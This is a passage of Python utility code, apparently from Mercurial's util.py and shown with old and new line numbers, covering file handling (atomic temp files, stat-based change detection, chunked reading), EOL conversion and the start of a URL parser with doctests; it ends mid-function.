1910 1924 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1911 1925 if flags & remod.IGNORECASE:
1912 1926 pat = '(?i)' + pat
1913 1927 if flags & remod.MULTILINE:
1914 1928 pat = '(?m)' + pat
1915 1929 try:
1916 1930 return re2.compile(pat)
1917 1931 except re2.error:
1918 1932 pass
1919 1933 return remod.compile(pat, flags)
1920 1934
1921 1935 @propertycache
1922 1936 def escape(self):
1923 1937 '''Return the version of escape corresponding to self.compile.
1924 1938
1925 1939 This is imperfect because whether re2 or re is used for a particular
1926 1940 function depends on the flags, etc, but it's the best we can do.
1927 1941 '''
1928 1942 global _re2
1929 1943 if _re2 is None:
1930 1944 self._checkre2()
1931 1945 if _re2:
1932 1946 return re2.escape
1933 1947 else:
1934 1948 return remod.escape
1935 1949
1936 1950 re = _re()
1937 1951
1938 1952 _fspathcache = {}
1939 1953 def fspath(name, root):
1940 1954 '''Get name in the case stored in the filesystem
1941 1955
1942 1956 The name should be relative to root, and be normcase-ed for efficiency.
1943 1957
1944 1958 Note that this function is unnecessary, and should not be
1945 1959 called, for case-sensitive filesystems (simply because it's expensive).
1946 1960
1947 1961 The root should be normcase-ed, too.
1948 1962 '''
1949 1963 def _makefspathcacheentry(dir):
1950 1964 return dict((normcase(n), n) for n in os.listdir(dir))
1951 1965
1952 1966 seps = pycompat.ossep
1953 1967 if pycompat.osaltsep:
1954 1968 seps = seps + pycompat.osaltsep
1955 1969 # Protect backslashes. This gets silly very quickly.
1956 1970 seps.replace('\\','\\\\')
1957 1971 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1958 1972 dir = os.path.normpath(root)
1959 1973 result = []
1960 1974 for part, sep in pattern.findall(name):
1961 1975 if sep:
1962 1976 result.append(sep)
1963 1977 continue
1964 1978
1965 1979 if dir not in _fspathcache:
1966 1980 _fspathcache[dir] = _makefspathcacheentry(dir)
1967 1981 contents = _fspathcache[dir]
1968 1982
1969 1983 found = contents.get(part)
1970 1984 if not found:
1971 1985 # retry "once per directory" per "dirstate.walk" which
1972 1986 # may take place for each patches of "hg qpush", for example
1973 1987 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1974 1988 found = contents.get(part)
1975 1989
1976 1990 result.append(found or part)
1977 1991 dir = os.path.join(dir, part)
1978 1992
1979 1993 return ''.join(result)
1980 1994
1981 1995 def checknlink(testfile):
1982 1996 '''check whether hardlink count reporting works properly'''
1983 1997
1984 1998 # testfile may be open, so we need a separate file for checking to
1985 1999 # work around issue2543 (or testfile may get lost on Samba shares)
1986 2000 f1, f2, fp = None, None, None
1987 2001 try:
1988 2002 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1989 2003 suffix='1~', dir=os.path.dirname(testfile))
1990 2004 os.close(fd)
1991 2005 f2 = '%s2~' % f1[:-2]
1992 2006
1993 2007 oslink(f1, f2)
1994 2008 # nlinks() may behave differently for files on Windows shares if
1995 2009 # the file is open.
1996 2010 fp = posixfile(f2)
1997 2011 return nlinks(f2) > 1
1998 2012 except OSError:
1999 2013 return False
2000 2014 finally:
2001 2015 if fp is not None:
2002 2016 fp.close()
2003 2017 for f in (f1, f2):
2004 2018 try:
2005 2019 if f is not None:
2006 2020 os.unlink(f)
2007 2021 except OSError:
2008 2022 pass
2009 2023
2010 2024 def endswithsep(path):
2011 2025 '''Check path ends with os.sep or os.altsep.'''
2012 2026 return (path.endswith(pycompat.ossep)
2013 2027 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2014 2028
2015 2029 def splitpath(path):
2016 2030 '''Split path by os.sep.
2017 2031 Note that this function does not use os.altsep because this is
2018 2032 an alternative of simple "xxx.split(os.sep)".
2019 2033 It is recommended to use os.path.normpath() before using this
2020 2034 function if need.'''
2021 2035 return path.split(pycompat.ossep)
2022 2036
2023 2037 def mktempcopy(name, emptyok=False, createmode=None):
2024 2038 """Create a temporary file with the same contents from name
2025 2039
2026 2040 The permission bits are copied from the original file.
2027 2041
2028 2042 If the temporary file is going to be truncated immediately, you
2029 2043 can use emptyok=True as an optimization.
2030 2044
2031 2045 Returns the name of the temporary file.
2032 2046 """
2033 2047 d, fn = os.path.split(name)
2034 2048 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2035 2049 os.close(fd)
2036 2050 # Temporary files are created with mode 0600, which is usually not
2037 2051 # what we want. If the original file already exists, just copy
2038 2052 # its mode. Otherwise, manually obey umask.
2039 2053 copymode(name, temp, createmode)
2040 2054 if emptyok:
2041 2055 return temp
2042 2056 try:
2043 2057 try:
2044 2058 ifp = posixfile(name, "rb")
2045 2059 except IOError as inst:
2046 2060 if inst.errno == errno.ENOENT:
2047 2061 return temp
2048 2062 if not getattr(inst, 'filename', None):
2049 2063 inst.filename = name
2050 2064 raise
2051 2065 ofp = posixfile(temp, "wb")
2052 2066 for chunk in filechunkiter(ifp):
2053 2067 ofp.write(chunk)
2054 2068 ifp.close()
2055 2069 ofp.close()
2056 2070 except: # re-raises
2057 2071 try:
2058 2072 os.unlink(temp)
2059 2073 except OSError:
2060 2074 pass
2061 2075 raise
2062 2076 return temp
2063 2077
2064 2078 class filestat(object):
2065 2079 """help to exactly detect change of a file
2066 2080
2067 2081 'stat' attribute is result of 'os.stat()' if specified 'path'
2068 2082 exists. Otherwise, it is None. This can avoid preparative
2069 2083 'exists()' examination on client side of this class.
2070 2084 """
2071 2085 def __init__(self, stat):
2072 2086 self.stat = stat
2073 2087
2074 2088 @classmethod
2075 2089 def frompath(cls, path):
2076 2090 try:
2077 2091 stat = os.stat(path)
2078 2092 except OSError as err:
2079 2093 if err.errno != errno.ENOENT:
2080 2094 raise
2081 2095 stat = None
2082 2096 return cls(stat)
2083 2097
2084 2098 @classmethod
2085 2099 def fromfp(cls, fp):
2086 2100 stat = os.fstat(fp.fileno())
2087 2101 return cls(stat)
2088 2102
2089 2103 __hash__ = object.__hash__
2090 2104
2091 2105 def __eq__(self, old):
2092 2106 try:
2093 2107 # if ambiguity between stat of new and old file is
2094 2108 # avoided, comparison of size, ctime and mtime is enough
2095 2109 # to exactly detect change of a file regardless of platform
2096 2110 return (self.stat.st_size == old.stat.st_size and
2097 2111 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2098 2112 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2099 2113 except AttributeError:
2100 2114 pass
2101 2115 try:
2102 2116 return self.stat is None and old.stat is None
2103 2117 except AttributeError:
2104 2118 return False
2105 2119
2106 2120 def isambig(self, old):
2107 2121 """Examine whether new (= self) stat is ambiguous against old one
2108 2122
2109 2123 "S[N]" below means stat of a file at N-th change:
2110 2124
2111 2125 - S[n-1].ctime < S[n].ctime: can detect change of a file
2112 2126 - S[n-1].ctime == S[n].ctime
2113 2127 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2114 2128 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2115 2129 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2116 2130 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2117 2131
2118 2132 Case (*2) above means that a file was changed twice or more at
2119 2133 same time in sec (= S[n-1].ctime), and comparison of timestamp
2120 2134 is ambiguous.
2121 2135
2122 2136 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2123 2137 timestamp is ambiguous".
2124 2138
2125 2139 But advancing mtime only in case (*2) doesn't work as
2126 2140 expected, because naturally advanced S[n].mtime in case (*1)
2127 2141 might be equal to manually advanced S[n-1 or earlier].mtime.
2128 2142
2129 2143 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2130 2144 treated as ambiguous regardless of mtime, to avoid overlooking
2131 2145 by confliction between such mtime.
2132 2146
2133 2147 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2134 2148 S[n].mtime", even if size of a file isn't changed.
2135 2149 """
2136 2150 try:
2137 2151 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2138 2152 except AttributeError:
2139 2153 return False
2140 2154
2141 2155 def avoidambig(self, path, old):
2142 2156 """Change file stat of specified path to avoid ambiguity
2143 2157
2144 2158 'old' should be previous filestat of 'path'.
2145 2159
2146 2160 This skips avoiding ambiguity, if a process doesn't have
2147 2161 appropriate privileges for 'path'. This returns False in this
2148 2162 case.
2149 2163
2150 2164 Otherwise, this returns True, as "ambiguity is avoided".
2151 2165 """
2152 2166 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2153 2167 try:
2154 2168 os.utime(path, (advanced, advanced))
2155 2169 except OSError as inst:
2156 2170 if inst.errno == errno.EPERM:
2157 2171 # utime() on the file created by another user causes EPERM,
2158 2172 # if a process doesn't have appropriate privileges
2159 2173 return False
2160 2174 raise
2161 2175 return True
2162 2176
2163 2177 def __ne__(self, other):
2164 2178 return not self == other
2165 2179
2166 2180 class atomictempfile(object):
2167 2181 '''writable file object that atomically updates a file
2168 2182
2169 2183 All writes will go to a temporary copy of the original file. Call
2170 2184 close() when you are done writing, and atomictempfile will rename
2171 2185 the temporary copy to the original name, making the changes
2172 2186 visible. If the object is destroyed without being closed, all your
2173 2187 writes are discarded.
2174 2188
2175 2189 checkambig argument of constructor is used with filestat, and is
2176 2190 useful only if target file is guarded by any lock (e.g. repo.lock
2177 2191 or repo.wlock).
2178 2192 '''
2179 2193 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2180 2194 self.__name = name # permanent name
2181 2195 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2182 2196 createmode=createmode)
2183 2197 self._fp = posixfile(self._tempname, mode)
2184 2198 self._checkambig = checkambig
2185 2199
2186 2200 # delegated methods
2187 2201 self.read = self._fp.read
2188 2202 self.write = self._fp.write
2189 2203 self.seek = self._fp.seek
2190 2204 self.tell = self._fp.tell
2191 2205 self.fileno = self._fp.fileno
2192 2206
2193 2207 def close(self):
2194 2208 if not self._fp.closed:
2195 2209 self._fp.close()
2196 2210 filename = localpath(self.__name)
2197 2211 oldstat = self._checkambig and filestat.frompath(filename)
2198 2212 if oldstat and oldstat.stat:
2199 2213 rename(self._tempname, filename)
2200 2214 newstat = filestat.frompath(filename)
2201 2215 if newstat.isambig(oldstat):
2202 2216 # stat of changed file is ambiguous to original one
2203 2217 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2204 2218 os.utime(filename, (advanced, advanced))
2205 2219 else:
2206 2220 rename(self._tempname, filename)
2207 2221
2208 2222 def discard(self):
2209 2223 if not self._fp.closed:
2210 2224 try:
2211 2225 os.unlink(self._tempname)
2212 2226 except OSError:
2213 2227 pass
2214 2228 self._fp.close()
2215 2229
2216 2230 def __del__(self):
2217 2231 if safehasattr(self, '_fp'): # constructor actually did something
2218 2232 self.discard()
2219 2233
2220 2234 def __enter__(self):
2221 2235 return self
2222 2236
2223 2237 def __exit__(self, exctype, excvalue, traceback):
2224 2238 if exctype is not None:
2225 2239 self.discard()
2226 2240 else:
2227 2241 self.close()
2228 2242
2229 2243 def unlinkpath(f, ignoremissing=False, rmdir=True):
2230 2244 """unlink and remove the directory if it is empty"""
2231 2245 if ignoremissing:
2232 2246 tryunlink(f)
2233 2247 else:
2234 2248 unlink(f)
2235 2249 if rmdir:
2236 2250 # try removing directories that might now be empty
2237 2251 try:
2238 2252 removedirs(os.path.dirname(f))
2239 2253 except OSError:
2240 2254 pass
2241 2255
2242 2256 def tryunlink(f):
2243 2257 """Attempt to remove a file, ignoring ENOENT errors."""
2244 2258 try:
2245 2259 unlink(f)
2246 2260 except OSError as e:
2247 2261 if e.errno != errno.ENOENT:
2248 2262 raise
2249 2263
2250 2264 def makedirs(name, mode=None, notindexed=False):
2251 2265 """recursive directory creation with parent mode inheritance
2252 2266
2253 2267 Newly created directories are marked as "not to be indexed by
2254 2268 the content indexing service", if ``notindexed`` is specified
2255 2269 for "write" mode access.
2256 2270 """
2257 2271 try:
2258 2272 makedir(name, notindexed)
2259 2273 except OSError as err:
2260 2274 if err.errno == errno.EEXIST:
2261 2275 return
2262 2276 if err.errno != errno.ENOENT or not name:
2263 2277 raise
2264 2278 parent = os.path.dirname(os.path.abspath(name))
2265 2279 if parent == name:
2266 2280 raise
2267 2281 makedirs(parent, mode, notindexed)
2268 2282 try:
2269 2283 makedir(name, notindexed)
2270 2284 except OSError as err:
2271 2285 # Catch EEXIST to handle races
2272 2286 if err.errno == errno.EEXIST:
2273 2287 return
2274 2288 raise
2275 2289 if mode is not None:
2276 2290 os.chmod(name, mode)
2277 2291
2278 2292 def readfile(path):
2279 2293 with open(path, 'rb') as fp:
2280 2294 return fp.read()
2281 2295
2282 2296 def writefile(path, text):
2283 2297 with open(path, 'wb') as fp:
2284 2298 fp.write(text)
2285 2299
2286 2300 def appendfile(path, text):
2287 2301 with open(path, 'ab') as fp:
2288 2302 fp.write(text)
2289 2303
2290 2304 class chunkbuffer(object):
2291 2305 """Allow arbitrary sized chunks of data to be efficiently read from an
2292 2306 iterator over chunks of arbitrary size."""
2293 2307
2294 2308 def __init__(self, in_iter):
2295 2309 """in_iter is the iterator that's iterating over the input chunks."""
2296 2310 def splitbig(chunks):
2297 2311 for chunk in chunks:
2298 2312 if len(chunk) > 2**20:
2299 2313 pos = 0
2300 2314 while pos < len(chunk):
2301 2315 end = pos + 2 ** 18
2302 2316 yield chunk[pos:end]
2303 2317 pos = end
2304 2318 else:
2305 2319 yield chunk
2306 2320 self.iter = splitbig(in_iter)
2307 2321 self._queue = collections.deque()
2308 2322 self._chunkoffset = 0
2309 2323
2310 2324 def read(self, l=None):
2311 2325 """Read L bytes of data from the iterator of chunks of data.
2312 2326 Returns less than L bytes if the iterator runs dry.
2313 2327
2314 2328 If size parameter is omitted, read everything"""
2315 2329 if l is None:
2316 2330 return ''.join(self.iter)
2317 2331
2318 2332 left = l
2319 2333 buf = []
2320 2334 queue = self._queue
2321 2335 while left > 0:
2322 2336 # refill the queue
2323 2337 if not queue:
2324 2338 target = 2**18
2325 2339 for chunk in self.iter:
2326 2340 queue.append(chunk)
2327 2341 target -= len(chunk)
2328 2342 if target <= 0:
2329 2343 break
2330 2344 if not queue:
2331 2345 break
2332 2346
2333 2347 # The easy way to do this would be to queue.popleft(), modify the
2334 2348 # chunk (if necessary), then queue.appendleft(). However, for cases
2335 2349 # where we read partial chunk content, this incurs 2 dequeue
2336 2350 # mutations and creates a new str for the remaining chunk in the
2337 2351 # queue. Our code below avoids this overhead.
2338 2352
2339 2353 chunk = queue[0]
2340 2354 chunkl = len(chunk)
2341 2355 offset = self._chunkoffset
2342 2356
2343 2357 # Use full chunk.
2344 2358 if offset == 0 and left >= chunkl:
2345 2359 left -= chunkl
2346 2360 queue.popleft()
2347 2361 buf.append(chunk)
2348 2362 # self._chunkoffset remains at 0.
2349 2363 continue
2350 2364
2351 2365 chunkremaining = chunkl - offset
2352 2366
2353 2367 # Use all of unconsumed part of chunk.
2354 2368 if left >= chunkremaining:
2355 2369 left -= chunkremaining
2356 2370 queue.popleft()
2357 2371 # offset == 0 is enabled by block above, so this won't merely
2358 2372 # copy via ``chunk[0:]``.
2359 2373 buf.append(chunk[offset:])
2360 2374 self._chunkoffset = 0
2361 2375
2362 2376 # Partial chunk needed.
2363 2377 else:
2364 2378 buf.append(chunk[offset:offset + left])
2365 2379 self._chunkoffset += left
2366 2380 left -= chunkremaining
2367 2381
2368 2382 return ''.join(buf)
2369 2383
2370 2384 def filechunkiter(f, size=131072, limit=None):
2371 2385 """Create a generator that produces the data in the file size
2372 2386 (default 131072) bytes at a time, up to optional limit (default is
2373 2387 to read all data). Chunks may be less than size bytes if the
2374 2388 chunk is the last chunk in the file, or the file is a socket or
2375 2389 some other type of file that sometimes reads less data than is
2376 2390 requested."""
2377 2391 assert size >= 0
2378 2392 assert limit is None or limit >= 0
2379 2393 while True:
2380 2394 if limit is None:
2381 2395 nbytes = size
2382 2396 else:
2383 2397 nbytes = min(limit, size)
2384 2398 s = nbytes and f.read(nbytes)
2385 2399 if not s:
2386 2400 break
2387 2401 if limit:
2388 2402 limit -= len(s)
2389 2403 yield s
2390 2404
2391 2405 class cappedreader(object):
2392 2406 """A file object proxy that allows reading up to N bytes.
2393 2407
2394 2408 Given a source file object, instances of this type allow reading up to
2395 2409 N bytes from that source file object. Attempts to read past the allowed
2396 2410 limit are treated as EOF.
2397 2411
2398 2412 It is assumed that I/O is not performed on the original file object
2399 2413 in addition to I/O that is performed by this instance. If there is,
2400 2414 state tracking will get out of sync and unexpected results will ensue.
2401 2415 """
2402 2416 def __init__(self, fh, limit):
2403 2417 """Allow reading up to <limit> bytes from <fh>."""
2404 2418 self._fh = fh
2405 2419 self._left = limit
2406 2420
2407 2421 def read(self, n=-1):
2408 2422 if not self._left:
2409 2423 return b''
2410 2424
2411 2425 if n < 0:
2412 2426 n = self._left
2413 2427
2414 2428 data = self._fh.read(min(n, self._left))
2415 2429 self._left -= len(data)
2416 2430 assert self._left >= 0
2417 2431
2418 2432 return data
2419 2433
2420 2434 def readinto(self, b):
2421 2435 res = self.read(len(b))
2422 2436 if res is None:
2423 2437 return None
2424 2438
2425 2439 b[0:len(res)] = res
2426 2440 return len(res)
2427 2441
2428 2442 def unitcountfn(*unittable):
2429 2443 '''return a function that renders a readable count of some quantity'''
2430 2444
2431 2445 def go(count):
2432 2446 for multiplier, divisor, format in unittable:
2433 2447 if abs(count) >= divisor * multiplier:
2434 2448 return format % (count / float(divisor))
2435 2449 return unittable[-1][2] % count
2436 2450
2437 2451 return go
2438 2452
2439 2453 def processlinerange(fromline, toline):
2440 2454 """Check that linerange <fromline>:<toline> makes sense and return a
2441 2455 0-based range.
2442 2456
2443 2457 >>> processlinerange(10, 20)
2444 2458 (9, 20)
2445 2459 >>> processlinerange(2, 1)
2446 2460 Traceback (most recent call last):
2447 2461 ...
2448 2462 ParseError: line range must be positive
2449 2463 >>> processlinerange(0, 5)
2450 2464 Traceback (most recent call last):
2451 2465 ...
2452 2466 ParseError: fromline must be strictly positive
2453 2467 """
2454 2468 if toline - fromline < 0:
2455 2469 raise error.ParseError(_("line range must be positive"))
2456 2470 if fromline < 1:
2457 2471 raise error.ParseError(_("fromline must be strictly positive"))
2458 2472 return fromline - 1, toline
2459 2473
2460 2474 bytecount = unitcountfn(
2461 2475 (100, 1 << 30, _('%.0f GB')),
2462 2476 (10, 1 << 30, _('%.1f GB')),
2463 2477 (1, 1 << 30, _('%.2f GB')),
2464 2478 (100, 1 << 20, _('%.0f MB')),
2465 2479 (10, 1 << 20, _('%.1f MB')),
2466 2480 (1, 1 << 20, _('%.2f MB')),
2467 2481 (100, 1 << 10, _('%.0f KB')),
2468 2482 (10, 1 << 10, _('%.1f KB')),
2469 2483 (1, 1 << 10, _('%.2f KB')),
2470 2484 (1, 1, _('%.0f bytes')),
2471 2485 )
2472 2486
2473 2487 class transformingwriter(object):
2474 2488 """Writable file wrapper to transform data by function"""
2475 2489
2476 2490 def __init__(self, fp, encode):
2477 2491 self._fp = fp
2478 2492 self._encode = encode
2479 2493
2480 2494 def close(self):
2481 2495 self._fp.close()
2482 2496
2483 2497 def flush(self):
2484 2498 self._fp.flush()
2485 2499
2486 2500 def write(self, data):
2487 2501 return self._fp.write(self._encode(data))
2488 2502
2489 2503 # Matches a single EOL which can either be a CRLF where repeated CR
2490 2504 # are removed or a LF. We do not care about old Macintosh files, so a
2491 2505 # stray CR is an error.
2492 2506 _eolre = remod.compile(br'\r*\n')
2493 2507
2494 2508 def tolf(s):
2495 2509 return _eolre.sub('\n', s)
2496 2510
2497 2511 def tocrlf(s):
2498 2512 return _eolre.sub('\r\n', s)
2499 2513
2500 2514 def _crlfwriter(fp):
2501 2515 return transformingwriter(fp, tocrlf)
2502 2516
2503 2517 if pycompat.oslinesep == '\r\n':
2504 2518 tonativeeol = tocrlf
2505 2519 fromnativeeol = tolf
2506 2520 nativeeolwriter = _crlfwriter
2507 2521 else:
2508 2522 tonativeeol = pycompat.identity
2509 2523 fromnativeeol = pycompat.identity
2510 2524 nativeeolwriter = pycompat.identity
2511 2525
2512 2526 if (pyplatform.python_implementation() == 'CPython' and
2513 2527 sys.version_info < (3, 0)):
2514 2528 # There is an issue in CPython that some IO methods do not handle EINTR
2515 2529 # correctly. The following table shows what CPython version (and functions)
2516 2530 # are affected (buggy: has the EINTR bug, okay: otherwise):
2517 2531 #
2518 2532 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2519 2533 # --------------------------------------------------
2520 2534 # fp.__iter__ | buggy | buggy | okay
2521 2535 # fp.read* | buggy | okay [1] | okay
2522 2536 #
2523 2537 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2524 2538 #
2525 2539 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2526 2540 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2527 2541 #
2528 2542 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2529 2543 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2530 2544 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2531 2545 # fp.__iter__ but not other fp.read* methods.
2532 2546 #
2533 2547 # On modern systems like Linux, the "read" syscall cannot be interrupted
2534 2548 # when reading "fast" files like on-disk files. So the EINTR issue only
2535 2549 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2536 2550 # files approximately as "fast" files and use the fast (unsafe) code path,
2537 2551 # to minimize the performance impact.
2538 2552 if sys.version_info >= (2, 7, 4):
2539 2553 # fp.readline deals with EINTR correctly, use it as a workaround.
2540 2554 def _safeiterfile(fp):
2541 2555 return iter(fp.readline, '')
2542 2556 else:
2543 2557 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2544 2558 # note: this may block longer than necessary because of bufsize.
2545 2559 def _safeiterfile(fp, bufsize=4096):
2546 2560 fd = fp.fileno()
2547 2561 line = ''
2548 2562 while True:
2549 2563 try:
2550 2564 buf = os.read(fd, bufsize)
2551 2565 except OSError as ex:
2552 2566 # os.read only raises EINTR before any data is read
2553 2567 if ex.errno == errno.EINTR:
2554 2568 continue
2555 2569 else:
2556 2570 raise
2557 2571 line += buf
2558 2572 if '\n' in buf:
2559 2573 splitted = line.splitlines(True)
2560 2574 line = ''
2561 2575 for l in splitted:
2562 2576 if l[-1] == '\n':
2563 2577 yield l
2564 2578 else:
2565 2579 line = l
2566 2580 if not buf:
2567 2581 break
2568 2582 if line:
2569 2583 yield line
2570 2584
2571 2585 def iterfile(fp):
2572 2586 fastpath = True
2573 2587 if type(fp) is file:
2574 2588 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2575 2589 if fastpath:
2576 2590 return fp
2577 2591 else:
2578 2592 return _safeiterfile(fp)
2579 2593 else:
2580 2594 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2581 2595 def iterfile(fp):
2582 2596 return fp
2583 2597
2584 2598 def iterlines(iterator):
2585 2599 for chunk in iterator:
2586 2600 for line in chunk.splitlines():
2587 2601 yield line
2588 2602
2589 2603 def expandpath(path):
2590 2604 return os.path.expanduser(os.path.expandvars(path))
2591 2605
2592 2606 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2593 2607 """Return the result of interpolating items in the mapping into string s.
2594 2608
2595 2609 prefix is a single character string, or a two character string with
2596 2610 a backslash as the first character if the prefix needs to be escaped in
2597 2611 a regular expression.
2598 2612
2599 2613 fn is an optional function that will be applied to the replacement text
2600 2614 just before replacement.
2601 2615
2602 2616 escape_prefix is an optional flag that allows using doubled prefix for
2603 2617 its escaping.
2604 2618 """
2605 2619 fn = fn or (lambda s: s)
2606 2620 patterns = '|'.join(mapping.keys())
2607 2621 if escape_prefix:
2608 2622 patterns += '|' + prefix
2609 2623 if len(prefix) > 1:
2610 2624 prefix_char = prefix[1:]
2611 2625 else:
2612 2626 prefix_char = prefix
2613 2627 mapping[prefix_char] = prefix_char
2614 2628 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2615 2629 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2616 2630
2617 2631 def getport(port):
2618 2632 """Return the port for a given network service.
2619 2633
2620 2634 If port is an integer, it's returned as is. If it's a string, it's
2621 2635 looked up using socket.getservbyname(). If there's no matching
2622 2636 service, error.Abort is raised.
2623 2637 """
2624 2638 try:
2625 2639 return int(port)
2626 2640 except ValueError:
2627 2641 pass
2628 2642
2629 2643 try:
2630 2644 return socket.getservbyname(pycompat.sysstr(port))
2631 2645 except socket.error:
2632 2646 raise error.Abort(_("no port number associated with service '%s'")
2633 2647 % port)
2634 2648
2635 2649 class url(object):
2636 2650 r"""Reliable URL parser.
2637 2651
2638 2652 This parses URLs and provides attributes for the following
2639 2653 components:
2640 2654
2641 2655 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2642 2656
2643 2657 Missing components are set to None. The only exception is
2644 2658 fragment, which is set to '' if present but empty.
2645 2659
2646 2660 If parsefragment is False, fragment is included in query. If
2647 2661 parsequery is False, query is included in path. If both are
2648 2662 False, both fragment and query are included in path.
2649 2663
2650 2664 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2651 2665
2652 2666 Note that for backward compatibility reasons, bundle URLs do not
2653 2667 take host names. That means 'bundle://../' has a path of '../'.
2654 2668
2655 2669 Examples:
2656 2670
2657 2671 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2658 2672 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2659 2673 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2660 2674 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2661 2675 >>> url(b'file:///home/joe/repo')
2662 2676 <url scheme: 'file', path: '/home/joe/repo'>
2663 2677 >>> url(b'file:///c:/temp/foo/')
2664 2678 <url scheme: 'file', path: 'c:/temp/foo/'>
2665 2679 >>> url(b'bundle:foo')
2666 2680 <url scheme: 'bundle', path: 'foo'>
2667 2681 >>> url(b'bundle://../foo')
2668 2682 <url scheme: 'bundle', path: '../foo'>
2669 2683 >>> url(br'c:\foo\bar')
2670 2684 <url path: 'c:\\foo\\bar'>
2671 2685 >>> url(br'\\blah\blah\blah')
2672 2686 <url path: '\\\\blah\\blah\\blah'>
2673 2687 >>> url(br'\\blah\blah\blah#baz')
2674 2688 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2675 2689 >>> url(br'file:///C:\users\me')
2676 2690 <url scheme: 'file', path: 'C:\\users\\me'>
2677 2691
2678 2692 Authentication credentials:
2679 2693
2680 2694 >>> url(b'ssh://joe:xyz@x/repo')
2681 2695 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2682 2696 >>> url(b'ssh://joe@x/repo')
2683 2697 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2684 2698
2685 2699 Query strings and fragments:
2686 2700
2687 2701 >>> url(b'http://host/a?b#c')
2688 2702 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2689 2703 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2690 2704 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2691 2705
2692 2706 Empty path:
2693 2707
2694 2708 >>> url(b'')
2695 2709 <url path: ''>
2696 2710 >>> url(b'#a')
2697 2711 <url path: '', fragment: 'a'>
2698 2712 >>> url(b'http://host/')
2699 2713 <url scheme: 'http', host: 'host', path: ''>
2700 2714 >>> url(b'http://host/#a')
2701 2715 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2702 2716
2703 2717 Only scheme:
2704 2718
2705 2719 >>> url(b'http:')
2706 2720 <url scheme: 'http'>
2707 2721 """
2708 2722
2709 2723 _safechars = "!~*'()+"
2710 2724 _safepchars = "/!~*'()+:\\"
2711 2725 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2712 2726
2713 2727 def __init__(self, path, parsequery=True, parsefragment=True):
2714 2728 # We slowly chomp away at path until we have only the path left
2715 2729 self.scheme = self.user = self.passwd = self.host = None
2716 2730 self.port = self.path = self.query = self.fragment = None
2717 2731 self._localpath = True
2718 2732 self._hostport = ''
2719 2733 self._origpath = path
2720 2734
2721 2735 if parsefragment and '#' in path:
2722 2736 path, self.fragment = path.split('#', 1)
2723 2737
2724 2738 # special case for Windows drive letters and UNC paths
2725 2739 if hasdriveletter(path) or path.startswith('\\\\'):
2726 2740 self.path = path
2727 2741 return
2728 2742
2729 2743 # For compatibility reasons, we can't handle bundle paths as
2730 2744 # normal URLS
2731 2745 if path.startswith('bundle:'):
2732 2746 self.scheme = 'bundle'
2733 2747 path = path[7:]
2734 2748 if path.startswith('//'):
2735 2749 path = path[2:]
2736 2750 self.path = path
2737 2751 return
2738 2752
2739 2753 if self._matchscheme(path):
2740 2754 parts = path.split(':', 1)
2741 2755 if parts[0]:
2742 2756 self.scheme, path = parts
2743 2757 self._localpath = False
2744 2758
2745 2759 if not path:
2746 2760 path = None
2747 2761 if self._localpath:
2748 2762 self.path = ''
2749 2763 return
2750 2764 else:
2751 2765 if self._localpath:
2752 2766 self.path = path
2753 2767 return
2754 2768
2755 2769 if parsequery and '?' in path:
2756 2770 path, self.query = path.split('?', 1)
2757 2771 if not path:
2758 2772 path = None
2759 2773 if not self.query:
2760 2774 self.query = None
2761 2775
2762 2776 # // is required to specify a host/authority
2763 2777 if path and path.startswith('//'):
2764 2778 parts = path[2:].split('/', 1)
2765 2779 if len(parts) > 1:
2766 2780 self.host, path = parts
2767 2781 else:
2768 2782 self.host = parts[0]
2769 2783 path = None
2770 2784 if not self.host:
2771 2785 self.host = None
2772 2786 # path of file:///d is /d
2773 2787 # path of file:///d:/ is d:/, not /d:/
